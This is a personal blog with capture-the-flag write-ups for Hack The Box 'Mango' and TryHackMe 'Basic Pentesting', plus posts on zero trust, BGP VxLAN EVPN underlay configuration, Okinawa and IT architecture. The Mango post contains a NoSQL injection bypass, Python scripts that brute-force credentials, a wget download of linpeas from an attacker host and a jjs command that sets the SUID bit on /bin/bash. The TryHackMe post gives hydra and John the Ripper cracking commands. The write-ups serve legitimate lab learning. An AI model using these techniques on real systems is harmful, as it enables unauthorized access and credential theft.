Hack The Box – Mango

Whilst I’m not going to post about every machine I try on Hack The Box, I’ll likely post about the ones where I learnt something new, and this was an interesting one for me that took a while to work through and think about.

I made some effort not to spoil it for myself as this is an older retired machine, but the name hints that it likely has a MongoDB backend, which is a NoSQL database. I have some experience with basic authentication bypass via manipulating operators in field values, such as $eq (equals) and $ne (not equals).

When I checked the login page and saw the POST body username=admin&password=admin&login=login, I suspected I could attempt a simple ‘password not equals’ injection to bypass the authentication process.
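For reference, a minimal version of that bypass payload, reusing the field names from the form above, looks like this:

username=admin&password[$ne]=admin&login=login

If the backend passes these values straight into a MongoDB query, the password clause matches any document whose password is not the literal string ‘admin’, which for a real admin account is almost certainly true.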

The response indicated that it was being processed by the backend, presumably a NoSQL DB, but it redirected me to an error page, so I used Burp to try a few other auth bypass attempts and to extract some data. It is also worth noting that the website uses PHP, which parses bracketed query string inputs into arrays, thus allowing me to use [$regex] to search for a value in the DB.

I started by confirming this works by checking for a username starting with ‘a’, which is an obvious place to start, but I had also noted that admin was used in the website source as an email address.
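As an illustration, the request body for that first probe looked something like:

username[$regex]=^a.*$&password[$ne]=admin&login=login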

Anyway, luckily we got the expected response, which is a 302.

A non-match, which I got when repeating the test with a username starting with ‘b’, just responds with a 200.

At this point I suspected we could use this method to enumerate the username and potentially the password. I’m not a programmer, so this was an interesting challenge. I did a bit more research on NoSQL injection and it seemed pretty straightforward, so I started to write some code that would loop through the printable characters for the username, appending any that respond with a 302 and going through the loop again until we got a full username.

This is the code I wrote and ran, giving me the username of ‘admin’.

#!/usr/bin/env python3
# Enumerate a username via blind NoSQL injection: a 302 redirect
# means the regex prefix matched a document, a 200 means it did not.

import requests
import re
import string

url = 'http://staging-order.mango.htb/'
done = False
username = ""

while not done:
    done = True  # assume no progress; a hit below resets this
    for c in string.printable:
        data = {
            # match any username starting with what we know so far plus c
            "username[$regex]": f"^{re.escape(username + c)}.*$",
            # always-true clause so only the username test matters
            "password[$ne]": "admin",
            "login": "login"
        }
        r = requests.post(url, data=data, verify=False, allow_redirects=False)
        if r.status_code == 302:  # match: keep the character and go again
            done = False
            username += c
            print(c)
print(f"Username: {username}")

However, I’d need to extend this code so it would keep looking for additional usernames starting with other characters and then switch to checking for passwords against those usernames. I’m confident that with enough time I could get this working, and I still plan to do so, but it would likely take me a while and I wanted to own this machine… So after a quick search I found code that does just this, which can be found here: https://book.hacktricks.xyz/pentesting-web/nosql-injection
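For completeness, a minimal sketch of the password half of that extension, assuming the same endpoint and that the username has already been recovered, simply swaps which field carries the regex:

#!/usr/bin/env python3
# Sketch: enumerate a known user's password character by character.
# Assumes the same endpoint and form fields as the script above.

import requests
import re
import string

url = 'http://staging-order.mango.htb/'
user = "admin"  # an already-enumerated username
password = ""
done = False

while not done:
    done = True
    for c in string.printable:
        data = {
            "username": user,
            "password[$regex]": f"^{re.escape(password + c)}.*$",
            "login": "login"
        }
        r = requests.post(url, data=data, verify=False, allow_redirects=False)
        if r.status_code == 302:  # prefix matched: extend it and rescan
            done = False
            password += c
            break
print(f"Password for {user}: {password}")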

After running this code (it does take a while) I get the following output, showing an ‘admin’ and a ‘mango’ user, both with enumerated passwords.

As nmap showed that SSH was listening, I tried connecting to the target with the admin account, but that did not work. Trying with mango gave me access as the user mango.

Note: I always try to have something running in the background looking for other information or potential avenues of exploitation. To this effect I was running gobuster, but it didn’t really come up with much of interest.

Once I am on a target I usually do a few things, such as checking /etc/passwd to see what users are available and which may potentially have privileges, and testing ‘sudo -l’ to check if the user can run any command with elevated privileges. Whilst I saw the admin account in /etc/passwd, nothing else stood out, so I next searched for files with SUID set, using the command

find / -perm -4000 2>/dev/null

This finds a few interesting files, but the one that stands out to me is “/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs”, which I know is an old Java command-line tool to interpret scripts or run an interactive shell.

I also want to upload and run linpeas.sh, so I start a basic HTTP server on my local machine via the command python3 -m http.server 80 and then use wget on the target to fetch linpeas.sh. Once this is run, and after checking through the output, it confirms that the ‘jjs’ command is a good candidate.
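For reference, the transfer amounts to the following (the attacker IP is a placeholder):

python3 -m http.server 80                                # on my machine, from the directory holding linpeas.sh
wget http://<attacker-ip>/linpeas.sh -O /tmp/linpeas.sh  # on the target
chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh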

Prior to continuing I look for the user flag, and as it is not in mango’s home directory I change to the other account I found earlier, ‘admin’, via the command su - admin, and here I find the user flag.

Time to check GTFOBins for a way to leverage ‘jjs’ to escalate my privileges. I find an example which I slightly modify to set the SUID bit on bash, so I can then run bash and elevate my access. I run the command jjs and then execute:

Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()

This sets the SUID bit on the bash binary, which I can then run with /bin/bash -p to gain an escalated bash prompt. From here it is a simple matter to get the root flag in the /root directory.
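Putting it together, the whole escalation was roughly the following (using the full jjs path from the SUID search above):

/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()
jjs> exit()
ls -l /bin/bash    # confirm the s bit is now set
/bin/bash -p       # -p keeps the elevated effective privileges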

Final Thoughts

I really enjoyed this machine, especially gaining user access, as it required some NoSQL injection, in which I’ve only basic experience since SQL databases are more common in my line of work, and also writing some code to automate the enumeration.

This latter part was very interesting to me as I have not done a lot of coding since university and am trying to practice more Python when I get the chance, which is not often. The root access was a little simple, but that is typically the case once a user-level foothold is gained on the target.

The video of my attempt at this machine can be found here: https://youtu.be/q8gVAEWn2vg

Zero Trust Network – Hype Cycle?

As the hype cycle of artificial intelligence and machine learning starts to wane, a new contender for the marketecture focus has emerged. Well, it has been around for many years but is getting a lot more attention recently, where almost all the network and security vendors typically have it, or a reference to it, on their front page… That is of course ‘zero trust’.

I for one welcome the focus on zero trust, even though it is somewhat of a misnomer (more on that later), as it helps direct attention to an area of network security that has been a struggle for a long time. It has been part of network security, albeit in more niche areas, for many years, mainly in wireless deployments where mobility of the user is inherent and thus network location cannot be relied upon to provide a comprehensive security posture. Typically this was part of a mobility strategy where the user’s or system’s identity formed the basis of how security posture and controls were applied.

Fast forward 5-10 years, and with the increasing adoption of public cloud, which has further eroded, or at least stretched and evolved, the normal boundaries of a network, a more holistic approach to leveraging identity for network controls and access is gaining momentum.

Therefore, when I discuss the meaning of zero trust I consider treating every connection the same as the foundation; that is, every connection has no implied trust or untrust, enabling the right access to the right destination at the right time. The benefit of this is that being “off-net” is no longer an inhibitor and security controls can be proactively extended to all applications. It is key to understand that zero trust is not a product, technology, standard, pattern or process, but rather a principle that spans all technology domains.

Additionally, contrary to much vendor and industry marketing, the perimeter did not disappear, nor is it true that trust is no longer required; rather, how trust is leveraged and considered is now another tool in the tool belt, where trust is assigned based more on the identity, posture and requirements of an entity than inherited due to location or connectivity medium. It is still important to understand the boundaries of the network to enable an enhanced definition of policies for users and resources, and the criteria to log, monitor and inspect activities within these boundaries, with further understanding of expected behaviours provided by micro-segmentation and identity.

It is important to understand that a zero trust implementation is a marathon, not a sprint, allowing you to focus on the greatest risks and iterate over time. In the network it is also important not to attempt to control every connection, especially early on, but rather to work towards grouping connectivity based on identity and segmentation. This keeps the controls at the edge of the segment while leveraging the richer information provided by identity, visibility and logging within the network to make more informed security and control decisions.

Once the identity of an entity requesting a connection is known, a control can authenticate and authorize the connection to the destination based on a policy. For example, a firewall could block all traffic to an application by default, but based on its verified knowledge of the identity of the entity trying to establish the connection it could allow that connection to pass. This can be extended to specific destinations and specific times, all defined in a policy, regardless of the entity’s location.
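As a toy illustration of that example (entirely hypothetical names, not any vendor’s policy language), such an identity-based rule reduces to a default-deny lookup:

from datetime import datetime, time

# Each rule: (identity, required posture, destination, allowed time window).
RULES = [
    ("alice@corp.example", "compliant", "payroll-app", (time(8, 0), time(18, 0))),
]

def allow(identity: str, posture: str, destination: str, now: datetime) -> bool:
    for rule_id, rule_posture, rule_dest, (start, end) in RULES:
        if (identity == rule_id and posture == rule_posture
                and destination == rule_dest and start <= now.time() <= end):
            return True
    return False  # no matching rule: deny by default

# e.g. allow("alice@corp.example", "compliant", "payroll-app", datetime.now())

Note there is deliberately no notion of network location in the rule: the decision hangs off who is asking, the state of their device and when, not where they connect from.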

An important capability for a zero trust approach is not just enabling conditional access but also ensuring that access is secure, by preventing exploits, vulnerabilities and other attacks. This requires both a clear understanding of what should or should not be traversing the network and the visibility to measure, learn and adapt, which means the network controls can no longer focus just on layer 4; whilst that is still important, they also need better insight into layer 7.

Conceptually, the steps an organisation needs to undertake to adopt a zero trust approach are to define the landscape to which zero trust will be applied, identify the users, map that identity to the access they are authorised for, distribute the policy to the controls which will enforce the access, and monitor the connection to ensure it maintains compliance with the policy. This is an iterative process.

To enable the adoption of a zero trust approach, the network, meaning both the traffic traversing the network and the devices enabling it, needs to support identity-based controls, along with the ability to segment or isolate, and to remove any undesired or compromised component or traffic flow on demand.

Underpinning the ability to define the landscape is a micro-segmentation approach in the network, where workloads are segmented based on security, support and operational requirements, with well-defined zones for administration activities and shared services. This not only allows simplification of controls but also aids in visibility of compromised or misconfigured components.

Final Thoughts

As I mentioned at the start of this thought dump, zero trust is often misunderstood or misportrayed as meaning that no entity, be it user, application or system, should be trusted at all. Some trust is required; perhaps you need to trust your identity store or the links used to connect components. Rather, trust should not be implied without better consideration of what, how and why a connection is required. This is likely a long journey which cannot be completed with the purchase or implementation of a technology, but rather by adopting a micro-segmentation approach, which allows policies to be tailored to network zones and the expected behaviours and capabilities within those zones, and by identifying the requestor of connections along with who or what is making the request.

Whilst the zero trust question cannot be solved with technology alone, it also requires a new approach and a new way of thinking, acknowledging that most connectivity will originate from, or be destined to, an entity outside of the organisation’s network, be it administrators working from home or applications deployed to a Platform as a Service (PaaS), all with the goal of providing the least amount of access required for a user or function to accomplish a specific task.

To realise this zero trust approach, the network controls need to incorporate identity information to make decisions about what access to resources is enabled and what the user is authorised to do, in a dynamic and automated way, along with uplifting the ways of working to leverage these capabilities.

Therefore, the best place to start a zero trust journey is with the way you think about security and the mindset of applying controls, expanding the focus from the deeply ingrained network-centric approach to a more holistic view of what is actually required. Trying to do this without an underpinning of network automation will likely lead to lax or overbearing controls.

TryHackMe – Basic PenTest

A long long time ago in a country far far away I worked briefly in a CyberSecurity organisation that performed pentesting and auditing. My main area of focus was network and network security, thus looking at network reachability, exposure, routing, and auditing (and hardening) network infrastructure, mainly Cisco routers, switches and firewalls.

I’ve focused more on the network side of architecture for the last decade, after doing some time as a network security domain architect, so when I came across TryHackMe and Hack The Box I was pretty excited to delve back into it.

I thought I’d start off with something pretty easy, and what follows is my write-up and experience. I’ll likely post a few more write-ups as I do more machines. I mostly use this as a place to reflect and capture some of my experience, so this is likely not the best or most efficient example of how to pwn these machines, but that is not the point… it is to have some fun and hopefully learn (and dust off) some skills along the way.

I decided to start off with the ‘room’ called Basic Pentesting which utilises:

  • service enumeration
  • brute forcing
  • hash cracking
  • Linux enumeration

I’ve tried to provide some of the more interesting screenshots but have also provided the video if anyone wants to watch me stumble through it.

I typically start off with an nmap scan.

My typical nmap command variables are:

-sV: Probe open ports to determine service/version info

-sC: equivalent to --script=default

These are typically not too slow and provide a good amount of data to progress with. I normally also use -v so I can see the output in progress, for a full command of:

nmap -sC -sV -v -oN <output file> <ip address>

Whilst that is running I’ll check if the target is running a web service and look at the HTML source to see if there is anything obvious, or if I can see what languages are being used. The site was listed as under maintenance, but the source had a comment to check the ‘dev notes section’. I could start busting directories with gobuster or dirbuster, but decided to just try some manual directories, and after a few tries found the /development directory, which has a few notes providing a clue to two users, J and K, and also that J is using a weak password.

I also note that SMB is running from my nmap scan, and as nmap indicated the server was Ubuntu, I decide to run enum4linux. This is probably a good place to point out that as this is a for-purpose ‘hack’ box I’m not worried about being noisy, but in a real-world pentest one would typically try to be more stealthy and mask some of the scans and enumeration. Enum4linux shows that SMB has ‘Anonymous’ access enabled, so I connect via the command smbclient //<IP address>/Anonymous and find a text file that provides the user names ‘Jan’ and ‘Kay’.

I already know that Jan is using a weak password, so it is a good opportunity to try to brute force it, which I do with hydra, using the command:

hydra -l jan -P <password list> ssh://<IP address>

As you can see, I used ‘jan’ as the user and ‘rockyou.txt’ as the trusty password list, and after a few moments managed to brute force the password. Now having Jan’s password, and knowing that SSH is listening from the nmap scan, I connect using Jan’s credentials.

I poke around a bit but decide to upload linpeas, which is a great local Linux privilege escalation checklist script. This shows that Kay’s SSH private key ‘id_rsa’ is readable with Jan’s access, so I grab it.

I first attempt to connect using Kay’s SSH key but it is protected with a passphrase.

It is now time to try to crack Kay’s private key with John the Ripper. I first convert the private key into a format JtR can work with, using ‘ssh2john’, and then get to cracking. I manage to crack the passphrase on Kay’s SSH key with the command:

john --wordlist=<password list> <output of ssh2john>
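In full, with rockyou as the wordlist and my own file names, the steps look like this (on Kali, ssh2john may live at /usr/share/john/ssh2john.py):

ssh2john id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hash
john --show id_rsa.hash    # display the cracked passphrase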

Once the passphrase is cracked, we can use Kay’s SSH key and the cracked passphrase to SSH into the target as Kay, which enables me to find the final flag for this room.

Final Thoughts

This was a great way to get back into the groove: whilst it was simple, it did utilise a few different techniques to achieve the goal of obtaining access to the target. There are a few other methods that I would potentially try if doing this again, as whilst this room is easily completed with tools or scripts, there are more manual methods that could achieve the same outcome, but hey, why reinvent the wheel…

I really think that regardless of your level or experience, these hacking sites are a great way to improve your skills, but perhaps more importantly they provide some insight into how to deploy and manage your own networks, specifically how they can be protected, be it at home or for the organisation you work for.

As mentioned, this room was basic and didn’t require any new or unpublished vulnerability, but as a lot of people in the IT industry know, most breaches are via known and published vulnerabilities and exploits. It also leans into how technology is connected, and how security really is only as strong as the weakest link.

Addendum: As I have started playing around more with TryHackMe and Hack The Box, I’ve come across many great experts in the community that provide a much more detailed, correct and entertaining view into cybersecurity, and I’d like to shout out some of my favorites: John Hammond and IppSec. I recommend you look them up on YouTube as they have a lot of great content!

Update 12/07/21: I recently re-did this room so I could record it and provide a link here: https://youtu.be/pFnSCaN4kGA

BGP VxLAN EVPN – Part 2: Underlay

In the previous post, found here, I provided an overview of BGP VxLAN EVPN and mentioned that various IGPs could be used to provide the underlay. In this post I am going to flesh out what a potential underlay setup may look like based on OSPFv2.

There are some initial considerations which need to be defined when planning the underlay design, including:
  • MTU
  • Unicast Routing Protocol
  • IP addressing
  • Multicast for BUM traffic replication

VxLAN adds 50 bytes to the original Ethernet frame, which needs to be catered for to avoid fragmentation. The simplest way of doing this is to enable jumbo frames in the IP network where VxLAN will run. As most servers use a jumbo frame size of 9000, it is recommended that the switches be configured with a jumbo frame size of 9192 or 9216, depending on what the hardware model supports. This caters for the servers’ 9000 bytes plus the VxLAN overhead.

The next consideration is which IGP (unicast routing protocol) to utilise; however, as mentioned, this post will focus on OSPF.

IP addressing for the underlay needs to cater for the P2P links between the spine and leaf switches, the loopback interfaces on each spine and leaf switch and the multicast Rendezvous-Point (RP) address.

Whilst discussed in more detail later in this post, it should be noted that the mode of multicast used will likely depend on the hardware model. For example, on the Cisco Nexus range, unfortunately, not all Nexus models support the same multicast mode. Below is a list of what is supported on each Nexus model:

  • Nexus 1000v – IGMP v2/v3
  • Nexus 3000 – PIM ASM
  • Nexus 5600 – PIM BiDir
  • Nexus 7000/F3 – PIM ASM / PIM BiDir
  • Nexus 9000 – PIM ASM

In this example we will leverage a loopback address for our multicast RP address. As an example, for a medium-sized spine and leaf deployment with 4 spine switches and 20 leaf switches, the following IP address usage needs to be considered:

  • 4 Spine x 20 leaf = 80 P2P Links
  • 80 links, with an IP address at each end = 160 P2P IP addresses
  • 24 devices in total = 24 Loopback IP addresses.
  • Total = 160 P2P IP + 24 Loopback IP = 184 IP Addresses

Also note that, to conserve IP addresses, ‘ip unnumbered loopback 0’ may be used on the P2P interfaces, which means 1 IP address per device (see the sketch after the calculation below). This should be seriously considered for large deployments; however, for simplicity, in this example I am going to use 2 spine switches and 3 leaf switches with a unique IP address everywhere, meaning I need to cater for:

2 Spine x 3 leaf x 2 links each = 12 P2P links, with an IP address at each end = 24 P2P IP addresses, + 6 Loopback IP addresses.
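As an illustration of the unnumbered alternative (interface name arbitrary; on the Nexus 9000 the ‘medium p2p’ command is required before an Ethernet interface can borrow the loopback address):

interface Ethernet1/43
  mtu 9216
  medium p2p
  ip unnumbered loopback0
  ip ospf network point-to-point
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
  no shutdown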

I am also going to assume that in this example the servers are using the 10/8 IP address range, and thus I have opted to use the 192.168/16 range for the loopback interfaces, which are also used as the router IDs, and the 172.16/12 IP address range for the physical layer 3 P2P interfaces.

Also, for reference, whilst most of the theory is independent of the vendor and hardware, in this example I am using Cisco Nexus 9000 switches to implement this network technology, and as with all Nexus switches the features first need to be enabled, thus I have enabled the following:

Spine-1#show run | incl feature
feature nxapi
feature ospf
feature bgp
feature pim
feature interface-vlan
feature vn-segment-vlan-based
feature lacp
feature lldp
feature nv overlay

As the spine switches are the simplest to configure, I’ll start there with the first spine switch. As mentioned, depending on how MAC address replication and flooding is configured in the environment, multicast may be required. I’ll explain this in more detail later, but in this example I have enabled multicast and also nominated this spine switch as one of the RPs, with the following commands:

ip pim rp-address 192.168.1.0
ip pim anycast-rp 192.168.1.0 192.168.1.1
ip pim anycast-rp 192.168.1.0 192.168.1.2

Once this is done, the next step is to enable the underlay routing protocol. As I am using OSPF to provide IP reachability across the fabric, the first step is to configure the loopback interface which will be used as the router ID for the routing protocol, and then configure OSPF itself.

interface loopback0
description Router-ID - Spine1
ip address 192.168.1.1/32

router ospf UNDERLAY
router-id 192.168.1.1
log-adjacency-changes
maximum-paths 12
auto-cost reference-bandwidth 100000 Mbps
passive-interface default

The router ID is the IP address I assign to the loopback0 interface, and I use it for all router IDs defined on this switch.

The OSPF configuration is standard and should be familiar to anyone who has configured OSPF before; however, the command ‘maximum-paths’ may not be. This is enabled to provide equal-cost multi-pathing between my leaf and spine switches. I chose 12 just to have a large number I will likely never need to worry about again, but as long as this is equal to, or greater than, the number of physical links it will be fine. It is also good practice to define the reference bandwidth, and in this example I have configured 100000 Mbps, which is 100 Gbps and should cater for the largest link this environment will have. I also prefer to manually nominate any interfaces I wish to participate in OSPF, thus I have configured the interfaces to be passive by default.

TIP: By default OSPF uses broadcast for message propagation and DR election; however we want to use the network type point-to-point, thus ensure that ‘ip ospf network point-to-point’ is configured on the loopback and P2P interfaces.

Once this is done I can go back into the loopback interface and assign the OSPF and multicast parameters so the loopback interface participates in these protocols, with the following configuration:

interface loopback0
  description Router-ID - Spine1
  ip address 192.168.1.1/32
  ip ospf network point-to-point
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode

The next step is to configure the point-to-point interfaces and enable OSPF and multicast. As we are using VxLAN, we are going to increase the MTU to cater for the additional header size. Technically only an additional 50 bytes is required, but for simplicity I’ve decided to enable jumbo frames and set the MTU to 9216 on all physical interfaces.

interface Ethernet1/43
  description - DC01-LSL06-03 [Eth1/47]
  mtu 9216
  ip address 172.16.1.1/30
  ip ospf network point-to-point
  no ip ospf passive-interface
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
  no shutdown

It’s important to configure OSPF as point-to-point here to ensure there is no DR/BDR election, to keep a more optimised LSA database, and to avoid a full SPF calculation for a link failure. Also, as we nominated passive-interface default in OSPF, we need to enable this interface to participate in OSPF with the command ‘no ip ospf passive-interface’. I have also used a /30 for the point-to-point link, which is not ideal for preserving IP address space and may cause scale issues in a very large deployment, but for simplicity of configuration and troubleshooting I’ve decided the trade-off here is fine.

All the interconnects between the leaf and spine switches are via 2 x 10G interfaces, thus I need to replicate the above configuration on an additional interface, as per the following:

interface Ethernet1/44
  description - DC01-LSL06-03 [Eth1/48]
  mtu 9216
  ip address 172.16.1.5/30
  ip ospf network point-to-point
  no ip ospf passive-interface
  ip router ospf UNDERLAY area 0.0.0.0
  ip pim sparse-mode
  no shutdown

This should be repeated for all links between each spine and leaf, adjusting the IP addresses as required, until all of your switches form neighbor relationships as shown here:

Spine-1# show ip ospf neighbors
 OSPF Process ID UNDERLAY VRF default
 Total number of neighbors: 6
 Neighbor ID     Pri State            Up Time  Address         Interface
 192.168.1.13      1 FULL/ -          1w5d     172.16.1.2      Eth1/43
 192.168.1.13      1 FULL/ -          1w5d     172.16.1.6      Eth1/44
 192.168.1.12      1 FULL/ -          1w5d     172.16.1.10     Eth1/45
 192.168.1.12      1 FULL/ -          1w5d     172.16.1.14     Eth1/46
 192.168.1.11      1 FULL/ -          1w5d     172.16.1.18     Eth1/47
 192.168.1.11      1 FULL/ -          1w5d     172.16.1.22     Eth1/48

Also, as we enabled PIM multicast earlier, we can confirm it has formed the appropriate neighbor relationships with the following commands:

Spine-1# show ip pim neighbor
PIM Neighbor Status for VRF "default"
Neighbor        Interface            Uptime    Expires   DR       Bidir-  BFD
                                                         Priority Capable State
172.16.1.2      Ethernet1/43         1w5d      00:01:42  1        yes     n/a
172.16.1.6      Ethernet1/44         1w5d      00:01:35  1        yes     n/a
172.16.1.10     Ethernet1/45         1w5d      00:01:26  1        yes     n/a
172.16.1.14     Ethernet1/46         1w5d      00:01:23  1        yes     n/a
172.16.1.18     Ethernet1/47         1w5d      00:01:34  1        yes     n/a
172.16.1.22     Ethernet1/48         1w5d      00:01:44  1        yes     n/a
Spine-1# show ip pim interface brief
PIM Interface Status for VRF "default"
Interface            IP Address      PIM DR Address  Neighbor  Border
                                                     Count     Interface
Ethernet1/43         172.16.1.1      172.16.1.2      1         no
Ethernet1/44         172.16.1.5      172.16.1.6      1         no
Ethernet1/45         172.16.1.9      172.16.1.10     1         no
Ethernet1/46         172.16.1.13     172.16.1.14     1         no
Ethernet1/47         172.16.1.17     172.16.1.18     1         no
Ethernet1/48         172.16.1.21     172.16.1.22     1         no
loopback0            192.168.1.1     192.168.1.1     0         no

Note: As this example is from a spine switch, and each spine has 2 x 10G links to each of the 3 leaf switches, there are 6 entries above, plus the loopback (depending on which command is used).

This has now formed the underlay network with OSPF and multicast, and we can build the overlay and control plane network on top of it. It is critical that reachability across the underlay is consistent throughout the fabric, and this is a good point to test failure scenarios for the underlay. It is also a good point to finish this post, with the next one providing the overlay and control plane configuration details.


BGP VxLAN EVPN – Part 1: Overview

This post focuses on BGP VxLAN EVPN, and thus an understanding of BGP and VxLAN is very helpful for this topic. Additionally, EVPN and VxLAN are considered overlay technologies which run over an underlay IP fabric. In this context the underlay fabric’s purpose is to provide reachability between VTEPs.

Whilst outside the focus of this post, the main choices for the underlay are OSPF or IS-IS. There are pros and cons to each option: OSPFv2 is very well understood by most engineers and simple to deploy, however it does not support IPv6, and thus OSPFv3 would be required for IPv6 support, which is still not mature in vendor implementations. Alternatively, IS-IS has supported both IPv4 and IPv6 for many years and is well supported by vendors, but is not well understood by many engineers outside of telcos. Note: BGP can also be used as the underlay, but as it is also used in the overlay this can cause confusion and complexity. Using BGP for the underlay is fine; however, I would recommend doing your own research regarding the underlay protocol, taking into account the skills of the engineers who will be deploying and supporting the fabric.

In summary, VxLAN is a tunneling mechanism which takes a layer 2 frame or a layer 3 packet, encapsulates it with an IP header, and routes it to a VxLAN Virtual Tunnel End Point (VTEP) for decapsulation; it effectively encapsulates a MAC frame inside an IP packet.

Similar to VLANs, which have a 12-bit field specifying the VLAN to which the frame belongs, for a total of 4096 (2^12) VLAN tags, the VxLAN header includes a 24-bit field called the VxLAN Network Identifier (VNI), which allows up to 16 million (2^24) layer 2 domains.

By default, VXLAN uses flood-and-learn behaviour with a multicast control plane, which is fine for small deployments but does have scalability limitations in large deployments. Another method is ingress Head End Replication (HER), which does not require multicast but is still a flood-and-learn procedure. There are also some controller-based solutions, but these are outside the scope of this discussion.

To resolve the scaling limitations of the flood-and-learn approach, the Ethernet VPN (EVPN) control plane was created, utilising a new address family in Multi-Protocol BGP (MP-BGP) to distribute layer 2 and layer 3 host reachability information. MP-BGP was extended so that its Network Layer Reachability Information (NLRI) can carry both layer 2 MAC and layer 3 IP information at the same time, and this is called EVPN, Ethernet Virtual Private Network. It also offers a range of other benefits, such as the reduction of data centre traffic through ARP suppression.

Utilising BGP as the control plane for VxLAN enables capabilities such as MAC address learning and VRF multi-tenancy while providing optimised equal-cost multi-pathing (ECMP). The new BGP address family exchanges NLRI via a series of route types. Of these route types, the two most applicable for this discussion are:

Type 2 – Host MAC and IP addresses (MAC-VRF)
Type 5 – IP Prefix information (IP-VRF)

Type-2 routes (RT-2) are used to advertise an end host’s MAC and IP address within the VLAN over an IP network. A VxLAN Network Identifier (VNI) is mapped to a VLAN, and all VTEPs (typically leaf switches) within the VNI use RT-2 to share and learn the end hosts’ MAC addresses to provide layer 2 reachability.

Type-5 routes (RT-5) are used to advertise IP prefixes. A VXLAN Network Identifier (VNI) is mapped to a Virtual Routing and Forwarding (VRF) instance, which identifies a tenant within the fabric, allowing multiple tenants and route tables to coexist.

The advertisement of the type 5 EVPN attribute provides the NLRI between subnets and routing contexts, allowing the learning of prefixes (not MACs) advertised across different VRFs in the fabric. This means the fabric can provide end-to-end segmentation without being aware of the segmentation itself. For example, a VRF context can be created on a pair of leaf switches and be extended to some other pair of leaf switches without the devices in between being aware of the VRFs. With EVPN, only the leaf switches need to possess the VRFs to which endpoints are attached, allowing the spine switches to simply provide transit between leafs.

There are two models to provide inter-subnet routing with EVPN, which are asymmetric integrated routing and bridging (IRB) and symmetric IRB. The main difference between the asymmetric IRB model and symmetric IRB model is how and where the routing lookup is done, which results in differences concerning which VNI the packet travels on through the infrastructure.

The asymmetric model allows routing and bridging on the VXLAN tunnel ingress, but only bridging on the egress. This results in bi-directional VXLAN traffic traveling on different VNIs in each direction (always the destination VNI) across the routed infrastructure.

The symmetric model routes and bridges on both the ingress and the egress leafs. This results in bi-directional traffic being able to travel on the same VNI, hence the symmetric name. However, a new specialty transit VNI is used for all routed VXLAN traffic, called the L3VNI. All traffic that needs to be routed will be routed onto the L3VNI, tunneled across the layer 3 Infrastructure, routed off the L3VNI to the appropriate VLAN and ultimately bridged to the destination.

Depending on the vendor hardware, the choice between the asymmetric and symmetric models may not be of concern, as some hardware only supports one model, and thus you will need to configure the fabric based on that limitation.

Generally, if you configure all VLANs/Subnets/VNIs on all leafs anyway then the asymmetric model is fine and may be simpler to configure as it doesn’t require extra VNIs.

If your VLANs/Subnets/VNIs are widely dispersed and/or provisioned on the fly, then the symmetric model is better and all routed traffic will use a transit VNI (L3VNI), while bridged traffic will use L2VNI.

NOTE: The symmetric model is what Cisco utilises and supports.

This should provide an overview of EVPN, and I’ll delve into more technical detail and configuration in subsequent posts.

Oki Life

I’ve been living on the beautiful island of Okinawa for 1 year now. It has been one of the most challenging choices I’ve made, to move to a country where I do not know the language or the culture, but luckily for me the locals are very friendly, tolerant and patient, and often understand English.

Looking back over my time here, I regret not making more of an effort to learn the language, something I plan to address very soon, but I’ve also learnt a lot about Japan and Okinawa, and about the people that make this place so enchanting.

This post is just to share some of the photos of Okinawa, which capture my time here and also to assist me in reflecting on the allure of this island.


These represent but a fraction of my experience here, but they are all windows to times I’ve felt happiness, wonder and peace.

I’m not sure how long I’ll be here or where I may go next but these photos remind me that beauty can be found everywhere and anywhere, you just have to open your eyes to it.

I expect that I’ll pause here a while longer, as I may not have gone where I intended to go, but I think I have ended up where I needed to be.

To Architect or Design, that is the question?

In IT, there are various roles, such as architect and designer, and the line between these two definitions seems to get blurred. I find that they often mean different things to different people and companies. This can also make understanding a potential candidate’s strengths hard, as there is no clear formal definition; a person with the title of network designer may be performing more of a network architecture function, and vice versa.

In the IT industry the terms designer and architect largely follow the broader definitions used in other industries, but unlike other industries, which may have very clear descriptions, in IT they are often used interchangeably. However, I believe there is a significant difference between the two, which, based on my own experience, I will try to discuss here and maybe provide some insight and perspective. I also think both skills are critical to a successful IT department in any mid-to-large-size organisation.

ISO/IEC 42010:2007 defines “architecture” as: “The fundamental organization of a system, embodied in its components, their relationships to each other and the environment, and the principles governing its design and evolution.”

TOGAF embraces, but does not strictly adhere to, ISO/IEC 42010:2007 terminology. In TOGAF (based on my 9.1 certification and knowledge), “architecture” has two meanings depending upon the context:

  • A formal description of a system, or a detailed plan of the system at a component level to guide its implementation.
  • The structure of components, their inter-relationships, and the principles and guidelines governing their design and evolution over time.

My view of the role of an architect is to optimize the often fragmented legacy processes, technologies and capabilities in a way that is responsive to change and enables the delivery of the business strategy. It enables the effective utilisation of information and technology to assist the business in achieving a competitive advantage, and in enhancing the user experience both internal and external to the business.

IT architecture focuses on the broader, holistic view of how systems interoperate with each other and the principles they should adhere to. It typically defines the choice of framework, capabilities, scope, goals and high-level methodologies which will be used.

An IT designer’s focus is to plan how the systems will be organised, how the components of a system will work and integrate, how the system will be implemented, and the specifications which should be met during, and at the end of, the implementation and/or integration.

Whilst these may seem in large part like the same thing, I believe IT architecture is more objective-focused, analysing the requirements, the system and how it will be measured, whilst design is more subjective, as it is based more on the usage of a system and how it will operate and be managed.

Simply put, IT architecture often involves looking at all the features from a business and IT perspective, how they interrelate, the inputs and outputs of how the system will be supported or used, and the broader implications for the business as a whole. Design is typically more focused on the system itself, and its technical aspects, features and constraints.

That said, as mentioned, both skills are important: while an architect may focus on the overall aesthetics of the system and the integration with the business, a designer is typically looking for the purest technical solution. Architecture faces towards strategy, structure and the abstract; design faces towards implementation and practice, towards the concrete. Therefore, when combined, a design defines how a chosen architecture is applied to the given requirements.

Architecture without design does nothing: it can too easily remain stuck in an ‘ivory-tower’ world, seeking ever finer and more idealised abstractions and solutions, at the risk of never realising practical outcomes.

Design without architecture tends towards point solutions that are optimised solely for a single task and context, often developed only for the current techniques and technologies, and often with high levels of hidden ‘technical debt’.

